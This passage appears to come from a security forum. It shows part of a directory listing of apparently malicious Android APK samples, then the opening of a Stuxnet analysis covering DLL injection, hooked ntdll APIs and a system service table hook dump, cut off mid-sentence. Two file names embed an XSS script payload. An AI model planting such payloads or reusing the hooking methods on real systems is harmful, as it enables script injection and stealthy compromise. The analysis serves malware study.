[/TD] [/TR] [TR] [TD][/TD] [TD]736c2f95dcbc4b192e77b1e155c4cd3c1e2cd34334444a3ac64191b74cefe5e2.apk[/TD] [TD=align: right]14-Nov-2014 15:45 [/TD] [TD=align: right]387K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]777.apk[/TD] [TD=align: right]14-Nov-2014 15:48 [/TD] [TD=align: right] 19K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]878fd235a4e34868f3a6243353e21bcc13e9eac7.apk[/TD] [TD=align: right]14-Nov-2014 15:46 [/TD] [TD=align: right] 11M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]888.apk[/TD] [TD=align: right]14-Nov-2014 15:47 [/TD] [TD=align: right] 19K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]948d0b99cd012738f0377038a699f41174c1b64170178ea5a7038a0b5174fdf3.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right]336K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]1451.apk[/TD] [TD=align: right]14-Nov-2014 15:46 [/TD] [TD=align: right]516K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]1923f6b154c79224cf6b5e4d584ccfb4.apk[/TD] [TD=align: right]14-Nov-2014 15:46 [/TD] [TD=align: right]652K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]2014.10.apk[/TD] [TD=align: right]14-Nov-2014 15:46 [/TD] [TD=align: right]600K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]2101.apk[/TD] [TD=align: right]14-Nov-2014 15:46 [/TD] [TD=align: right]454K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]2312bsam_40_samsungtasss5570_signed_20101222.apk[/TD] [TD=align: right]14-Nov-2014 15:47 [/TD] [TD=align: right]541K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]3507.Automattic.Inc-WordPress_v2.3.2.apk[/TD] [TD=align: right]14-Nov-2014 15:47 [/TD] [TD=align: right]1.7M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]3536ba06a0d71b0f0a6f30f98ae0485c.apk[/TD] [TD=align: right]14-Nov-2014 15:47 [/TD] [TD=align: right]1.8M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]4682.apk[/TD] [TD=align: right]14-Nov-2014 15:47 [/TD] [TD=align: right]171K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]5001 Amazing Facts (1.4).apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right]4.2M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]5203ac33.apk[/TD] [TD=align: right]14-Nov-2014 15:47 [/TD] [TD=align: right]1.1M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]5444.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right]1.4M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]10627-Rocket-Robo-2.apk[/TD] [TD=align: right]14-Nov-2014 15:47 [/TD] [TD=align: right]8.2M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]11115-Warhammer-40.000-Carnage-v182886.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right] 12M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]26213_foto.apk[/TD] [TD=align: right]14-Nov-2014 15:47 [/TD] [TD=align: right]748K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]88870ad3c7bd42cfe1d728b4a4ccc104.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right]307K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]333333.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right] 19K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]414448f7891b967d55d60b4e3787940a.apk[/TD] [TD=align: right]14-Nov-2014 15:47 [/TD] [TD=align: right]1.0M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]996536_18591898_1407754377368.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right]3.3M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]36203881a8a68c2feee5adb844abeb25.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right]2.4M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]1394640204-my-talking-tom-v1.4.1.apk[/TD] [TD=align: right]14-Nov-2014 15:49 [/TD] [TD=align: right] 14M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]1645225337.apk[/TD] [TD=align: right]14-Nov-2014 15:49 [/TD] [TD=align: right]5.2M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]<svgonload=alert(1)>xss.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right]5.2M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]<svgonload=alert(1)>xsss.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right]309K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]AAFarm_rev.6.apk[/TD] [TD=align: right]14-Nov-2014 15:48 [/TD] [TD=align: right]3.1M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]AC62E4ECAEDEA6351D80C352EB8FCBAF.apk[/TD] [TD=align: right]14-Nov-2014 15:47 [/TD] [TD=align: right]5.6M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]AC339.apk[/TD] [TD=align: right]14-Nov-2014 15:47 [/TD] [TD=align: right]3.8M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]AFWall-1.3.0.1-Free.apk[/TD] [TD=align: right]14-Nov-2014 15:47 [/TD] [TD=align: right]3.5M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]AG Aussie News (2.2).apk[/TD] [TD=align: right]14-Nov-2014 15:45 [/TD] [TD=align: right] 94K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]AG Dutch Newspapers - Kranten (2.0).apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right] 87K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]AIME.apk[/TD] [TD=align: right]14-Nov-2014 15:45 [/TD] [TD=align: right]2.4M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]AIMP.apk[/TD] [TD=align: right]14-Nov-2014 15:48 [/TD] [TD=align: right]1.7M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]AMAPNetworkLocation.apk[/TD] [TD=align: right]14-Nov-2014 15:45 [/TD] [TD=align: right]158K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]ANDR.apk[/TD] [TD=align: right]14-Nov-2014 15:49 [/TD] [TD=align: right]123K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]ANDxJoe.apk[/TD] [TD=align: right]14-Nov-2014 15:45 [/TD] [TD=align: right]108K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]ANTPlusPlugins.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right]415K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]AOSM.apk[/TD] [TD=align: right]14-Nov-2014 15:45 [/TD] [TD=align: right]176K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]APK-instrumenter.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right]454K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]APNdroid.apk[/TD] [TD=align: right]14-Nov-2014 15:46 [/TD] [TD=align: right] 62K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]APPLE.apk[/TD] [TD=align: right]14-Nov-2014 15:46 [/TD] [TD=align: right]5.0M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]ARMv6+VFP+Codec+1.7.1.apk[/TD] [TD=align: right]14-Nov-2014 15:45 [/TD] [TD=align: right]4.0M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]ASTRO.Pro.Key.v1.0.1.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right] 15K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]ASTRO File Manager (2.3.1).apk[/TD] [TD=align: right]14-Nov-2014 15:46 [/TD] [TD=align: right]2.0M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]ASTROFileManagerBrowserProv4.3.467-android-zone.org.apk[/TD] [TD=align: right]14-Nov-2014 15:48 [/TD] [TD=align: right]5.1M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]ATumble (1.70).apk[/TD] [TD=align: right]14-Nov-2014 15:49 [/TD] [TD=align: right] 83K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]AccuWeatherPlatinumv3.2.10.3.paid.apk[/TD] [TD=align: right]14-Nov-2014 15:47 [/TD] [TD=align: right]7.1M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Act 1 Video Player (2.10.0).apk[/TD] [TD=align: right]14-Nov-2014 15:47 [/TD] [TD=align: right]127K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Activities.apk[/TD] [TD=align: right]14-Nov-2014 15:48 [/TD] [TD=align: right]3.9M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Activity.pro.v3.0.1.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right]1.6M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]AdAway.apk[/TD] [TD=align: right]14-Nov-2014 15:48 [/TD] [TD=align: right]2.6M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]AdAwayv2.6apkgalaxy.com.apk[/TD] [TD=align: right]14-Nov-2014 15:49 [/TD] [TD=align: right]2.9M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Adfree.apk[/TD] [TD=align: right]14-Nov-2014 15:48 [/TD] [TD=align: right] 22K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Adjustable_Torch_ROOT_1_6_1.apk[/TD] [TD=align: right]14-Nov-2014 15:45 [/TD] [TD=align: right]430K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]AdobeFlashPlayer.apk[/TD] [TD=align: right]14-Nov-2014 15:45 [/TD] [TD=align: right] 73K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]AdobePhotoshopTouchv1.5.1.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right] 46M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Advanced Bubble Level Pro (1.0.1).apk[/TD] [TD=align: right]14-Nov-2014 15:48 [/TD] [TD=align: right]459K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Advanced Task Killer PRO (1.7.6).apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right] 48K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Advanced Task Manager (4.0.1).apk[/TD] [TD=align: right]14-Nov-2014 15:46 [/TD] [TD=align: right]166K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Age.of.Conquest.N.America.v1.0.3.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right]2.1M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Air.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right]2.9M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]AirDroid_1.0.5beta.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right]3.8M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]AirDroid_2.1.0.apk[/TD] [TD=align: right]14-Nov-2014 15:45 [/TD] [TD=align: right] 11M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Airadvance.v1.01.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right]7.2M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Aircontrolfull.v1.20.apk[/TD] [TD=align: right]14-Nov-2014 15:48 [/TD] [TD=align: right]2.4M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Akbank_Direkt_Tablet.apk[/TD] [TD=align: right]14-Nov-2014 15:45 [/TD] [TD=align: right]6.0M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Akinator (2.0).apk[/TD] [TD=align: right]14-Nov-2014 15:49 [/TD] [TD=align: right]1.9M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Alarm Master (1.0).apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right]596K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Alarming! Alarm Clock (2.2.0).apk[/TD] [TD=align: right]14-Nov-2014 15:45 [/TD] [TD=align: right]637K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Album Art Grabber (1.1.5).apk[/TD] [TD=align: right]14-Nov-2014 15:46 [/TD] [TD=align: right] 40K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Alchemy.premium.v1.9.1.apk[/TD] [TD=align: right]14-Nov-2014 15:47 [/TD] [TD=align: right]2.5M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Aldiko Book Reader Premium (1.2.9).apk[/TD] [TD=align: right]14-Nov-2014 15:47 [/TD] [TD=align: right]1.2M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Alexander-kingdom.strategy.alexander-36-v4.3.apk[/TD] [TD=align: right]14-Nov-2014 15:46 [/TD] [TD=align: right]5.3M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]AliExpress__3.4.2.apk[/TD] [TD=align: right]14-Nov-2014 15:48 [/TD] [TD=align: right]7.9M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]All Radio Stations (1.0).apk[/TD] [TD=align: right]14-Nov-2014 15:47 [/TD] [TD=align: right]2.9M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]AllSport GPS (3.0.54).apk[/TD] [TD=align: right]14-Nov-2014 15:45 [/TD] [TD=align: right]642K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]AltinGonder800x1280.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right]7.3M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Always Flash (26.03.21).apk[/TD] [TD=align: right]14-Nov-2014 15:48 [/TD] [TD=align: right] 16K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]AlwaysonPC+v2.7.4.apk[/TD] [TD=align: right]14-Nov-2014 15:48 [/TD] [TD=align: right]766K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Amarok Remote.apk[/TD] [TD=align: right]14-Nov-2014 15:46 [/TD] [TD=align: right] 26K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Amazed2.apk[/TD] [TD=align: right]14-Nov-2014 15:49 [/TD] [TD=align: right]1.6M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]AmazonApps-release.apk[/TD] [TD=align: right]14-Nov-2014 15:45 [/TD] [TD=align: right]5.2M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Ambling BookPlayer Personal (1.7).apk[/TD] [TD=align: right]14-Nov-2014 15:45 [/TD] [TD=align: right]328K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]AnTuTuBenchmark_4.3.2_1395060796084.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right]9.9M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]AndAR Model Viewer (1.0).apk[/TD] [TD=align: right]14-Nov-2014 15:45 [/TD] [TD=align: right]116K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]AndCAD (1.0).apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right]664K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]AndCam3D (1.3.2).apk[/TD] [TD=align: right]14-Nov-2014 15:46 [/TD] [TD=align: right]283K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]AndFTP.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right]450K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]AndTorrent (0.89.3).apk[/TD] [TD=align: right]14-Nov-2014 15:48 [/TD] [TD=align: right]109K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]AndWobble (1.9).apk[/TD] [TD=align: right]14-Nov-2014 15:48 [/TD] [TD=align: right]306K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]AndroMote Pro (1.2.3).apk[/TD] [TD=align: right]14-Nov-2014 15:46 [/TD] [TD=align: right]278K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Andro Shark (1.0).apk[/TD] [TD=align: right]14-Nov-2014 15:47 [/TD] [TD=align: right]426K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]AndroZip File Manager (0.9.8.1).apk[/TD] [TD=align: right]14-Nov-2014 15:45 [/TD] [TD=align: right]287K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Androffice (0.98).apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right]786K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Android-Hardware-Info-indirAPK.com_.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right] 51K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Android-QJ(4).apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right] 44K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Android-QJ.apk[/TD] [TD=align: right]14-Nov-2014 15:48 [/TD] [TD=align: right] 44K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Android.apk[/TD] [TD=align: right]14-Nov-2014 15:47 [/TD] [TD=align: right]108K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]AndroidAV.apk[/TD] [TD=align: right]14-Nov-2014 15:47 [/TD] [TD=align: right]3.7M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]AndroidApplication1.AndroidApplication1.apk[/TD] [TD=align: right]14-Nov-2014 15:45 [/TD] [TD=align: right]625K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Android Arcade Emulator (1.0.0).apk[/TD] [TD=align: right]14-Nov-2014 15:47 [/TD] [TD=align: right]1.1M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Android File Browser (2.0).apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right] 20K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Android IRC (1.7.2).apk[/TD] [TD=align: right]14-Nov-2014 15:46 [/TD] [TD=align: right]104K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Android Lock (1.0.0).apk[/TD] [TD=align: right]14-Nov-2014 15:46 [/TD] [TD=align: right]1.0M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]AndroidLollipop1.1.0.apk[/TD] [TD=align: right]14-Nov-2014 15:47 [/TD] [TD=align: right]6.0M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Android Mate (1.0.9).apk[/TD] [TD=align: right]14-Nov-2014 15:49 [/TD] [TD=align: right]171K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]AndroidSensorBox.apk[/TD] [TD=align: right]14-Nov-2014 15:45 [/TD] [TD=align: right]3.3M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Android VNC viewer.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right] 83K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Android Xtralogic Remote Client (1.5.0).apk[/TD] [TD=align: right]14-Nov-2014 15:47 [/TD] [TD=align: right]314K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Android_Play.apk[/TD] [TD=align: right]14-Nov-2014 15:45 [/TD] [TD=align: right]498K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Android_RDP_Client_v2.1.0.apk[/TD] [TD=align: right]14-Nov-2014 15:48 [/TD] [TD=align: right]250K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Android_Weather_amp_Clock_Widget_3_5_5.apk[/TD] [TD=align: right]14-Nov-2014 15:46 [/TD] [TD=align: right]3.4M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Androidrollergapp.apk[/TD] [TD=align: right]14-Nov-2014 15:48 [/TD] [TD=align: right]1.1M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Androids Fortune (0.1.0).apk[/TD] [TD=align: right]14-Nov-2014 15:49 [/TD] [TD=align: right] 60K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Androidtuxedohvga.apk[/TD] [TD=align: right]14-Nov-2014 15:45 [/TD] [TD=align: right]1.7M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Angry_BirdTransformers_1.1.0.apk[/TD] [TD=align: right]14-Nov-2014 15:45 [/TD] [TD=align: right]536K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Angry_Birds_Go_.apk[/TD] [TD=align: right]14-Nov-2014 15:46 [/TD] [TD=align: right]491K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Animal Translator (1.0)..apk[/TD] [TD=align: right]14-Nov-2014 15:47 [/TD] [TD=align: right] 61K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Anomaly2v1.0[Mali-400MP]apkmania.com.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right]2.4M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]AnonymousEmail (1.0.0).apk[/TD] [TD=align: right]14-Nov-2014 15:47 [/TD] [TD=align: right] 13K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]AntiEmuGadget.apk[/TD] [TD=align: right]14-Nov-2014 15:47 [/TD] [TD=align: right] 47K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Anti_Spy_Mobile_PRO_v1_9_9_4.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right]138K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Antibody.v1.6.apk[/TD] [TD=align: right]14-Nov-2014 15:48 [/TD] [TD=align: right]399K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Antigen.v1.1.apk[/TD] [TD=align: right]14-Nov-2014 15:45 [/TD] [TD=align: right]2.0M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Any Clip Pro (1.2.8).apk[/TD] [TD=align: right]14-Nov-2014 15:46 [/TD] [TD=align: right] 52K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]AnyRSS reader Widget (3.4).apk[/TD] [TD=align: right]14-Nov-2014 15:47 [/TD] [TD=align: right]147K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Ape.apk[/TD] [TD=align: right]14-Nov-2014 15:47 [/TD] [TD=align: right]584K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]ApiDemos.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right]2.3M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Apollo.apk[/TD] [TD=align: right]14-Nov-2014 15:47 [/TD] [TD=align: right]1.5M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]App.apk[/TD] [TD=align: right]14-Nov-2014 15:44 [/TD] [TD=align: right] 25K[/TD] [TD] [/TD] [/TR] [/TABLE] Sursa si multe altele: Index of /samples

[h=3]Stuxnet - User/Kernel-Mode analysis[/h] [h=3]Stuxnet - User/Kernel-Mode analysis[/h] Today I'll be taking a look at Stuxnet, and at a kernel level mostly (as usual) more than its impact on user-mode. I'll still however be going over a few user-mode things as it ties in with our kernel level discussion. I also won't go in-depth regarding all of the ways Stuxnet uses its four-slot toolbelt of zero-day flaws, and a lot of other Stuxnet's methods of attack (network, etc). ESET, Symantec, and others have done a fantastic job in that regard. What is Stuxnet? First of all, it's important (and a bit hilarious) to know the story behind Stuxnet. If you're researching Stuxnet for the first time, it's really easy to get confused. There's finger pointing, claims, supposed "confirmed sources", etc, left and right. I'll briefly go over it. For example: Confirmed: US and Israel created Stuxnet, lost control of it. The article is adapted from journalist David Sanger's forthcoming book, Confront and Conceal: Obama’s Secret Wars and Surprising Use of American Power, and it confirms that both the US and Israeli governments developed and deployed Stuxnet. Obama Order Sped Up Wave of Cyberattacks Against Iran. Computer security experts who began studying the worm, which had been developed by the United States and Israel, gave it a name: Stuxnet. US unleashed Stuxnet cyber war on Iran to appease Israel – report. The US and Israel made the Stuxnet virus as a new kind of weapon targeted against Iran, a media investigation revealed. The operation reportedly started in the Bush era, but was intensified by Obama administration. Snowden confirms NSA created Stuxnet with Israeli aid. “The NSA and Israel wrote Stuxnet together,” Snowden told Applebaum in the interview that was carried out in May. The big TLDR is here - Operation Olympic Games. My initial reaction was "What the hell am I reading?", and it still sort of is. It goes on and on. All in all, after reading the above, you're likely inclined to believe that the US (and maybe even Israel) were behind Stuxnet. Whether or not this is true is a story for another day, although it's easier to lean towards 'yes' than it is to 'no'. The reason for this is due to the fact that Stuxnet as I discussed above used four zero-day flaws within Windows. It's a pretty big deal when malware exploits one zero-day flaw within the OS, but four is extremely high. It's also pretty laughable to think that Stuxnet was created by amateurs not invested in any sort of organization regarding cyber warfare, etc of some sort, or amateurs in general. A lot of amateurs make malware for a lot of reasons, but causing nuclear centrifuges to commit suicide is pretty advanced. Aside from the many reasons to believe the answer is yes, some may lean towards no, and it's largely due to the fact that most cannot imagine the US and Israel working closely together to create something like Stuxnet. I digress, and in any case, I'm not here to discuss politics or debate the true creator(s), so let's just get to the part where we talk about what Stuxnet was primarily created for. Stuxnet is a worm that was developed primarily to target industrial PLCs, which led to the nuclear centrifuges ultimately destroying themselves. The malware obviously couldn't be outright sent to the nuclear facilities themselves, so this is where its USB attack vector comes into play. More notably known as a supply chain attack: So the creators of Stuxnet, they were thinking that these companies would do some communications with power plant workers; maybe exchange with USB devices. That’s probably how Stuxnet infected the system. Stuxnet patient zero: Kaspesky Lab identifies worm’s first victims in Iran. In the end, Stuxnet ended up destroying nearly one-fifth of Iran's centrifuges. In November 2010, it was reported that uranium enrichment within the Natanz nuclear facility had halted several times due to severe technical issues. User-Mode Stuxnet has two ways of injecting itself into the address space of a process and then executing exported functions. Stuxnet's user-mode modules are implemented as DLLs, and the first method is done by injecting itself into a preexisting process. Preexisting Process Inject 1. Allocates a memory buffer in the calling process for the modules to be loaded. 2. Patches ntdll and hooks the following APIs: ZwMapViewOfSection. ZwCreateSection. ZwOpenFile. ZwClose. ZwQueryAttributesFile. ZwQuerySection. Here's what a clean (unpatched) ntdll MZ header looks like: We can see some of these hooks in action: ServiceDescriptor n°0 --------------------- ServiceTable : nt!KiServiceTable (804e26a8) ParamTableBase : nt!KiArgumentTable (80510088) NumberOfServices : 0000011c Index Args Check System call ----- ---- ----- ----------- 0019 0001 HOOK-> f8c5761c ##### Original -> nt!NtClose (805678dd) 0029 0007 HOOK-> f8c575d6 ##### Original -> nt!NtCreateKey (8057065d) 0032 0007 HOOK-> f8c57626 ##### Original -> nt!NtCreateSection (805652b3) 0035 0008 HOOK-> f8c575cc ##### Original -> nt!NtCreateThread (8058e63f) 003F 0001 HOOK-> f8c575db ##### Original -> nt!NtDeleteKey (805952be) 0041 0002 HOOK-> f8c575e5 ##### Original -> nt!NtDeleteValueKey (80592d50) 0044 0007 HOOK-> f8c57617 ##### Original -> nt!NtDuplicateObject (805715e0) 0062 0002 HOOK-> f8c575ea ##### Original -> nt!NtLoadKey (805aed5d) 007A 0004 HOOK-> f8c575b8 ##### Original -> nt!NtOpenProcess (805717c7) 0080 0004 HOOK-> f8c575bd ##### Original -> nt!NtOpenThread (8058a1bd) 00B1 0006 HOOK-> f8c5763f ##### Original -> nt!NtQueryValueKey (8056a1f1) 00C1 0003 HOOK-> f8c575f4 ##### Original -> nt!NtReplaceKey (8064f0fa) 00C8 0003 HOOK-> f8c57630 ##### Original -> nt!NtRequestWaitReplyPort (80576ce6) 00CC 0003 HOOK-> f8c575ef ##### Original -> nt!NtRestoreKey (8064ec91) 00D5 0002 HOOK-> f8c5762b ##### Original -> nt!NtSetContextThread (8062dcdf) 00ED 0003 HOOK-> f8c57635 ##### Original -> nt!NtSetSecurityObject (8059b19b) 00F7 0006 HOOK-> f8c575e0 ##### Original -> nt!NtSetValueKey (80572889) 00FF 0006 HOOK-> f8c5763a ##### Original -> nt!NtSystemDebugControl (80649ce3) 0101 0002 HOOK-> f8c575c7 ##### Original -> nt!NtTerminateProcess (805822e0) If we for example go ahead and disassemble our hooked nt!NtClose function, we see the following: lkd> u 0xFFFFFFFFF8C5761C L1 f8c5761c e92d8b23fe jmp f6e9014e We have a 